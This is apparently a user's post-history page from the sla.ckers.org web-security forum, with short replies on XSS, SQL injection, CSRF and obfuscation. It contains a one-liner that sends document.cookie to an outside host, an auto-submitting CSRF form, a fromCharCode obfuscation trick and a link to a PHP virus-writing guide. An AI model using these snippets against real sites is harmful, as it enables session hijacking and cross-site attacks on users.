Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Whether this is about ha.ckers.org, sla.ckers.org or some other project you are interested in or want to talk about, throw it in here to get feedback. 

Pages: 1234Next
Current Page: 1 of 4
Results 1 - 30 of 111
4 years ago
backbone
The data returned by an ajax call is a string, so you can extract what you need through regular expressions. If you truly would like to access the form through DOM you should load the page in an iframe, and not by retrieving it via ajax calls.
Forum: XSS Info
4 years ago
backbone
nil
Forum: Full Disclosure
4 years ago
backbone
Someone took "hits from the bong"...
Forum: SQL and Code Injection
4 years ago
backbone
You're definitely a Perl guy... There are a couple of things you could change in it before spreading it: 1. For big files file() is expensive and slow. 2. You are not locking banned.txt when writing to it. 3. If you want to stop execution after alerting banned to the user, just use return false instead of $do = 'no', or better yet just exit() 4. You know that at the same time you can have s
Forum: Projects
4 years ago
backbone
maybe because there is a referrer check ?
Forum: CSRF and Session Info
4 years ago
backbone
@Gareth: Quote 4. Use htmlentities without the ENT_QUOTE option ehm, why? PoC code?
Forum: XSS Info
4 years ago
backbone
The easiest way would be through the POP3 protocol. POP3 PHP Class -> http://www.phpclasses.org/browse/file/3.html
Forum: Robots/Spiders/CAPTCHAs, oh my
5 years ago
backbone
Anonymous is not a group of hacky activits... Anonymous is legion!
Forum: DoS
5 years ago
backbone
well it's a joke, like most Microsoft software :)
Forum: News and Links
5 years ago
backbone
I'm rather astounded that nobody mentioned the javascript threading which can be achieved with Firefox 3.5... I've conducted an experiment to test the DoSness of them, but it's rather inconclusive. I've managed to crash Firefox in a couple of instances, only when executing other activities in parallel with the thread "bomber"... as mentioned it didn't always work... Of course the m
Forum: DoS
5 years ago
backbone

Forum: Obfuscation
5 years ago
backbone

Forum: Obfuscation
5 years ago
backbone
I was thinking about GnuPG but then you mentioned IIS... does PHP work under it?
Forum: Projects
5 years ago
backbone
<form action="target.url" method="post"> <input type="text" name="mail" value="xss-vector" /> </form> <script type="text/javascript">document.forms[0].submit();</script> is this what you're after? If not then try being more explicit
Forum: XSS Info
5 years ago
backbone
today is Casino Day... it's the third time today the same casino spam has been caught by akismet Quote Hi respected forum members, I present you a unknown casino in which you will consider on your own any games and build deck balcony house . We have a bountiful network of casino in Canada, USA, France and other countries, and decided to unqualified a new internet-casino! We demand defer game
Forum: OMG Ponies
5 years ago
backbone
Quote['string'] Quotewindow['String']['fromCharCode'](115,116,114,105,110,103) Quote{a:'string'}
Forum: Obfuscation
5 years ago
backbone
it actually was a spam comment:
Forum: OMG Ponies
5 years ago
backbone
Here's my twitter account, who knows I may even post something you're interested in http://twitter.com/dblackshell
Forum: News and Links
5 years ago
backbone
PaPPy Wrote: ------------------------------------------------------- > (...) > but i am really curious what will trigger a > report, if its xss (persistant and non > persistant), or malware, java? swf? > (...) It protects your BROWSER against possible exploitation of known or unknown BROWSER vulnerabilities.
Forum: News and Links
5 years ago
backbone
nobody said to load /bin/bash through SQLi. They said to load the .bash_history file... :)
Forum: SQL and Code Injection
5 years ago
backbone
What do you mean by "English International standard"? For converting from one charset to another you could use iconv http://www.php.net/manual/en/function.iconv.php . Google: XSS and UTF-7, for an example... regarding to db, the only one I know is from shiflett's article http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string, but as told there proper escapi
Forum: SQL and Code Injection
5 years ago
backbone
it didn't work for me... looked trough the source and haven't seen nothing malefic in it... (oh, and it's for digg only)
Forum: Robots/Spiders/CAPTCHAs, oh my
5 years ago
backbone
I'm more of a virus type, an old school PHP virus (writing guide), noting fancy http://vx.org.ua/29a/29a-7/Articles/29A-7.020
Forum: XSS Info
5 years ago
backbone
pixy, spike, rats... google anyone?
Forum: SQL and Code Injection
5 years ago
backbone
well I googled the error (go figures) and not the data type seems to be the problem, check out this.
Forum: SQL and Code Injection
5 years ago
backbone
QuoteWhen you use CAST to convert a CLOB value into a character datatype or a BLOB value into the RAW datatype, the database implicitly converts the LOB value to character or raw data and then explicitly casts the resulting value into the target datatype. If the resulting value is larger than the target type, then the database returns an error. I'm not familiar with Oracle, but I thing the rever
Forum: SQL and Code Injection
5 years ago
backbone
use the CAST function http://download.oracle.com/docs/cd/B19306_01/server.102/b14200/functions016.htm
Forum: SQL and Code Injection
5 years ago
backbone
findstr or wingrep :P
Forum: SQL and Code Injection
5 years ago
backbone
I use to do it without iframes new Image().src="http://site.com/script.php?pew="+encodeURI(document.cookie);
Forum: CSRF and Session Info
5 years ago
backbone
I double thrill's offer... and on top of that I'll click on adsense banner of your choice.
Forum: SQL and Code Injection
Pages: 1234Next
Current Page: 1 of 4